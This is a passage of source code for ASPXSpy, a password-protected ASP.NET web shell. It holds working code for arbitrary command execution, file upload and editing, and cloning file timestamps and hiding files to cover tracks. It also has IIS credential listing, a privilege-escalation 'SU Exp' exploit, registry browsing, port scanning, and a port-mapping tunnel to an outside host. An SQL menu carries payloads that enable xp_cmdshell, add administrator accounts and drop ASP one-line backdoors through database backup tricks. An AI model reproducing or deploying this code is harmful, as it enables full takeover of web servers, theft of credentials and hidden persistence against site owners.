1948. FJvQ(Bin_Files);
1949. }
1950. }
1951. else
1952. {
1953. if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
1954. {
1955. Response.Write(Bin_Files.FullName);
1956. FJvQ(Bin_Files);
1957. }
1958. }
1959. }
1960. else
1961. {
1962. StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
1963. string ava=sr.ReadToEnd();
1964. sr.Close();
1965. if(rAQ.Checked)
1966. {
1967. if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
1968. {
1969. FJvQ(Bin_Files);
1970. if(YZw.Checked)
1971. {
1972. ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
1973. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
1974. sw.Write(ava);
1975. sw.Close();
1976. }
1977. }
1978. }
1979. else
1980. {
1981. if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
1982. {
1983. FJvQ(Bin_Files);
1984. if(YZw.Checked)
1985. {
1986. ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
1987. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
1988. sw.Write(ava);
1989. sw.Close();
1990. }
1991. }
1992. }
1993. }
1994. }
1995. catch(Exception ex)
1996. {
1997. xseuB(ex.Message);
1998. continue;
1999. }
2000. }
2001. foreach(DirectoryInfo subdir in dir.GetDirectories())
2002. {
2003. oog(subdir);
2004. }
2005. }
2006. catch(Exception ex)
2007. {
2008. xseuB(ex.Message);
2009. }
2010. }
2011. public void FJvQ(FileInfo objfile)
2012. {
2013. TableRow tr=new TableRow();
2014. TableCell tc=new TableCell();
2015. string bg=OKM();
2016. tr.Attributes["onmouseover"]="this.className='focus';";
2017. tr.CssClass=bg;
2018. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
2019. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
2020. tr.Cells.Add(tc);
2021. tc=new TableCell();
2022. tc.Text=objfile.LastWriteTime.ToString();
2023. tr.Cells.Add(tc);
2024. tc=new TableCell();
2025. tc.Text=mTG(objfile.Length);
2026. tr.Cells.Add(tc);
2027. oJiym.Rows.Add(tr);
2028. }
2029. public void xseuB(string instr)
2030. {
2031. jDKt.Visible=true;
2032. jDKt.InnerText=instr;
2033. }
2034. protected void xVm(object sender,EventArgs e)
2035. {
2036. string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
2037. if(Jfm==Password)
2038. {
2039. Response.Cookies.Add(new HttpCookie(vbhLn,Password));
2040. ljtzC.Visible=false;
2041. PBZw();
2042. }
2043. else
2044. {
2045. tZSx();
2046. }
2047. }
2048. protected void Ybg(object sender,EventArgs e)
2049. {
2050. krIR(Server.MapPath("."));
2051. }
2052. protected void KjPi(object sender,EventArgs e)
2053. {
2054. Bin_H2_Title.InnerText="IIS Spy >>";
2055. WICxe();
2056. VNR.Visible=true;
2057. AdCx();
2058. }
2059. protected void DGCoW(object sender,EventArgs e)
2060. {
2061. try
2062. {
2063. StreamWriter sw;
2064. if(NdCX.SelectedItem.Text=="UTF-8")
2065. {
2066. sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
2067. }
2068. else
2069. {
2070. sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
2071. }
2072. sw.Write(Xgvv.InnerText);
2073. sw.Close();
2074. xseuB("Save file success !");
2075. }
2076. catch(Exception error)
2077. {
2078. xseuB(error.Message);
2079. }
2080. krIR(AXSbb.Value);
2081. }
2082. protected void lbjLD(object sender,EventArgs e)
2083. {
2084. string FlwA=AXSbb.Value;
2085. FlwA=OElM(FlwA);
2086. try
2087. {
2088. Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
2089. xseuB("File upload success!");
2090. }
2091. catch(Exception error)
2092. {
2093. xseuB(error.Message);
2094. }
2095. krIR(AXSbb.Value);
2096. }
2097. protected void EXV(object sender,EventArgs e)
2098. {
2099. krIR(AXSbb.Value);
2100. }
2101. protected void mcCY(object sender,EventArgs e)
2102. {
2103. krIR(Server.MapPath("."));
2104. }
2105. protected void iVk(object sender,CommandEventArgs e)
2106. {
2107. krIR(e.CommandArgument.ToString());
2108. }
2109. protected void XXrLw(object sender,EventArgs e)
2110. {
2111. try
2112. {
2113. File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
2114. File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
2115. File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
2116. xseuB("File time clone success!");
2117. }
2118. catch(Exception error)
2119. {
2120. xseuB(error.Message);
2121. }
2122. krIR(AXSbb.Value);
2123. }
2124. protected void tIykC(object sender,EventArgs e)
2125. {
2126. string path=pWVL.Value;
2127. try
2128. {
2129. File.SetAttributes(path,FileAttributes.Normal);
2130. if(ZhWSK.Checked)
2131. {
2132. File.SetAttributes(path,FileAttributes.ReadOnly);
2133. }
2134. if(SsR.Checked)
2135. {
2136. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
2137. }
2138. if(ccB.Checked)
2139. {
2140. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
2141. }
2142. if(fbyZ.Checked)
2143. {
2144. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
2145. }
2146. File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
2147. File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
2148. File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
2149. xseuB("File attributes modify success!");
2150. }
2151. catch(Exception error)
2152. {
2153. xseuB(error.Message);
2154. }
2155. krIR(AXSbb.Value);
2156. }
2157. protected void VOxn(object sender,EventArgs e)
2158. {
2159. WICxe();
2160. vIac.Visible=true;
2161. Bin_H2_Title.InnerText="Execute Command >>";
2162. }
2163. protected void FbhN(object sender,EventArgs e)
2164. {
2165. try
2166. {
2167. Process ahAE=new Process();
2168. ahAE.StartInfo.FileName=kusi.Value;
2169. ahAE.StartInfo.Arguments=bkcm.Value;
2170. ahAE.StartInfo.UseShellExecute=false;
2171. ahAE.StartInfo.RedirectStandardInput=true;
2172. ahAE.StartInfo.RedirectStandardOutput=true;
2173. ahAE.StartInfo.RedirectStandardError=true;
2174. ahAE.Start();
2175. string Uoc=ahAE.StandardOutput.ReadToEnd();
2176. Uoc=Uoc.Replace("<","&lt;");
2177. Uoc=Uoc.Replace(">","&gt;");
2178. Uoc=Uoc.Replace("\r\n","<br>");
2179. tnQRF.Visible=true;
2180. tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
2181. }
2182. catch(Exception error)
2183. {
2184. xseuB(error.Message);
2185. }
2186. }
2187. protected void RAFL(object sender,EventArgs e)
2188. {
2189. if(qPdI.Text.Length>0)
2190. {
2191. tpRQ(qPdI.Text);
2192. }
2193. else
2194. {
2195. lFAvw();
2196. }
2197. }
2198. protected void Grxk(object sender,EventArgs e)
2199. {
2200. YUw();
2201. }
2202. protected void ilC(object sender,EventArgs e)
2203. {
2204. tZRH();
2205. }
2206. protected void HtB(object sender,EventArgs e)
2207. {
2208. pDVM();
2209. }
2210. protected void Olm(object sender,EventArgs e)
2211. {
2212. iLVUT();
2213. }
2214. protected void jXhS(object sender,EventArgs e)
2215. {
2216. ADCpk();
2217. }
2218. protected void lRfRj(object sender,EventArgs e)
2219. {
2220. lDODR();
2221. }
2222. protected void xSy(object sender,EventArgs e)
2223. {
2224. xFhz();
2225. }
2226. protected void dMx(object sender,EventArgs e)
2227. {
2228. rAhe();
2229. }
2230. protected void zOVO(object sender,EventArgs e)
2231. {
2232. if(((DropDownList)sender).ID.ToString()=="WYmo")
2233. {
2234. dQIIF.Visible=false;
2235. MasR.Text=WYmo.SelectedItem.Value.ToString();
2236. }
2237. if(((DropDownList)sender).ID.ToString()=="Pvf")
2238. {
2239. xTZY();
2240. }
2241. if(((DropDownList)sender).ID.ToString()=="FGEy")
2242. {
2243. jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
2244. }
2245. if(((DropDownList)sender).ID.ToString()=="NdCX")
2246. {
2247. gLKc(Sqon.Value);
2248. }
2249. }
2250. protected void IkkO(object sender,EventArgs e)
2251. {
2252. krIR(AXSbb.Value);
2253. }
2254. protected void BGY(object sender,EventArgs e)
2255. {
2256. vCf();
2257. }
2258. protected void cptS(object sender,EventArgs e)
2259. {
2260. vNCHZ();
2261. }
2262. protected void fDO(object sender,EventArgs e)
2263. {
2264. MHLv();
2265. }
2266. protected void vJNsE(object sender,EventArgs e)
2267. {
2268. vuou();
2269. xseuB("Clear All Thread ......");
2270. }
2271. protected void wDZ(object sender,EventArgs e)
2272. {
2273. if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
2274. ruQO();
2275. xseuB("All Thread Start ......");
2276. }
2277. protected void tYoZ(object sender,EventArgs e)
2278. {
2279. }
2280. protected void ELkQ(object sender,EventArgs e)
2281. {
2282. VikG();
2283. GBYT.Visible=true;
2284. string res=string.Empty;
2285. foreach(ScanPort th in IVc)
2286. {
2287. res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
2288. }
2289. GBYT.InnerHtml=res;
2290. }
2291. protected void ORUgV(object sender,EventArgs e)
2292. {
2293. dwgT();
2294. }
2295. public void WICxe()
2296. {
2297. DCbS.Visible=false;
2298. CzfO.Visible=false;
2299. APl.Visible=false;
2300. vIac.Visible=false;
2301. kkHN.Visible=false;
2302. YwLB.Visible=false;
2303. iDgmL.Visible=false;
2304. hOWTm.Visible=false;
2305. vrFA.Visible=false;
2306. yhv.Visible=false;
2307. }
2308. </script>
2309. <html xmlns="http://www.w3.org/1999/xhtml" >
2310. <head id="Head1" runat="server">
2311. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
2312. <title>ASPXspy</title>
2313. <style type="text/css">
2314. .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
2315. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
2316. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
2317. .list{font:12px Arial,Tahoma;height:23px;}
2318. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
2319. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
2320. a {color: #00f;text-decoration:underline;}
2321. a:hover{color: #f00;text-decoration:none;}
2322. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
2323. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
2324. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
2325. .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
2326. .head td span{font-weight:normal;}
2327. form{margin:0;padding:0;}
2328. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
2329. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
2330. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
2331. .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
2332. .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
2333. </style>
2334. <script type="text/javascript">
2335. function CheckAll(form){
2336. for(var i=0;i<form.elements.length;i++){
2337. var e=form.elements[i];
2338. if(e.name!='chkall')
2339. e.checked=form.chkall.checked;
2340. }
2341. }
2342. </script>
2343. </head>
2344. <body style="margin:0;table-layout:fixed;">
2345. <form id="ASPXSpy" runat="server">
2346. <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
2347. <span style="font:11px Verdana;">Password:</span>
2348. <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
2349. <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
2350. Copyright &copy; 2017 TTK
2351. </div>
2352. <div id="ZVS" runat="server">
2353. <div id="Zzj" runat="server">
2354. <table width="100%" border="0" cellpadding="0" cellspacing="0">
2355. <tr class="head">
2356. <td ><span style="float:right;"><a href="https://google.com" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
2357. </tr>
2358. <tr class="alt1">
2359. <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
2360. <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
2361. </td>
2362. </tr>
2363. </table>
2364. </div>
2365. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
2366. <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
2367. <h2 id="Bin_H2_Title" runat="server"></h2>
2368. <%--FileList--%>
2369. <div id="CzfO" runat="server">
2370. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
2371.  <tr>
2372. <td style=" white-space:nowrap">Current Directory : </td>
2373. <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
2374. </td>
2375. <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
2376.  </tr>
2377. </table>
2378. <table width="100%" border="0" cellpadding="4" cellspacing="0">
2379. <tr class="alt1"><td colspan="7" style="padding:5px;">
2380. <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
2381. <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
2382.  | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
2383. </td></tr>
2384. <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
2385. <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
2386. </asp:Table>
2387. </table>
2388. </div>
2389. <%--FileEdit--%>
2390. <div id="vrFA" runat="server">
2391. <p>Current File(import new file name and new file)<br/>
2392. <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
2393. </p>
2394. <p>File Content<br/>
2395. <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
2396. </p>
2397. <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
2398. </div>
2399. <%--CloneTime--%>
2400. <div id="zRyG" runat="server" enableviewstate="false" visible="false">
2401. <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
2402. <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
2403. <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
2404. <h2>Set last modified &raquo;</h2>
2405. <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
2406. <p>
2407. <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
2408. &nbsp;
2409. <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
2410. &nbsp;
2411. <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
2412. &nbsp;
2413. <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
2414. </p>
2415. <p>
2416. CreationTime :
2417. <input class="input" id="yUqx" type="text" runat="server"/>
2418. LastWriteTime :
2419. <input class="input" id="uYjw" type="text" runat="server"/>
2420. LastAccessTime :
2421. <input class="input" id="aLsn" type="text" runat="server"/>
2422. </p>
2423. <p>
2424. <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
2425. </p>
2426. </div>
2427. <%--IISSpy--%>
2428. <div runat="server" id="VNR" visible="false" enableviewstate="false">
2429. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2430. <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
2431. <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
2432. </asp:Table>
2433. </table>
2434. </div>
2435. <%--Process--%>
2436. <div runat="server" id="DCbS" visible="false" enableviewstate="false">
2437. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2438. <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
2439. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
2440. </asp:Table>
2441. </table>
2442. </div>
2443. <%--CmdShell--%>
2444. <div runat="server" id="vIac">
2445.  <p>CmdPath:<br/>
2446.  <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
2447.  </p>
2448.  Argument:<br/>
2449.  <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
2450.  <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
2451.  </div>
2452. </div>
2453. <%--Services--%>
2454. <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
2455. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2456. <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
2457. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
2458. </asp:Table>
2459. </table>
2460. </div>
2461. <%--Sysinfo--%>
2462. <div runat="server" id="ghaB" visible="false" enableviewstate="false">
2463. <hr style=" border: 1px solid #ddd;height:0px;"/>
2464. <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
2465. <h2 id="Bin_H2_Mac" runat="server"></h2>
2466. <hr style=" border: 1px solid #ddd;height:0px;"/>
2467. <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
2468. <h2 id="Bin_H2_Driver" runat="server"></h2>
2469. <hr style=" border: 1px solid #ddd;height:0px;"/>
2470. <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
2471. </div>
2472. <%--UserInfo--%>
2473. <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
2474. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2475. <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
2476. </asp:Table>
2477. </table>
2478. </div>
2479. <%--SuExp--%>
2480.  <div runat="server" id="APl">
2481. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2482.  <tr align="center">
2483.  <td style="width:10%"></td>
2484.  <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
2485.  <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
2486.  <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
2487.  <td style="width:10%"></td>
2488.  </tr>
2489.  <tr >
2490.  <td style="width:10%"></td>
2491.  <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
2492.  </tr>
2493. </table>
2494. <div id="UHlA" visible="false" enableviewstate="false" runat="server">
2495. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2496. <tr align="center">
2497. <td style="width:30%"></td>
2498. <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
2499. <td style="width:30%"></td>
2500. </tr>
2501. </table>
2502. </div>
2503. </div>
2504. <%--Reg--%>
2505. <div id="kkHN" runat="server">
2506. <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
2507. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
2508. <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
2509. <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
2510. <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
2511. </asp:Table>
2512. </table>
2513. </div>
2514. <%--PortScan--%>
2515. <div id="YwLB" runat="server">
2516. <p>
2517. IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
2518. </p>
2519. <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
2520. </div>
2521. <%--DataBase--%>
2522. <div id="iDgmL" runat="server">
2523. <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
2524. <div id="dQIIF" runat="server">
2525. <div id="irTU" runat="server"></div>
2526. <div id="uXevN" runat="server">
2527. Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
2528. SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
2529. </div>
2530. <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
2531. <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
2532. <div style="overflow-x:auto;width:950px" >
2533. <p>
2534. <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
2535. </p>
2536. </div>
2537. </div>
2538. </div>
2539. <%--PortMap--%>
2540. <div id="hOWTm" runat="server">
2541. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2542. <tr align="center">
2543. <td style="width:5%"></td>
2544. <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
2545. <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
2546. <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
2547. <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
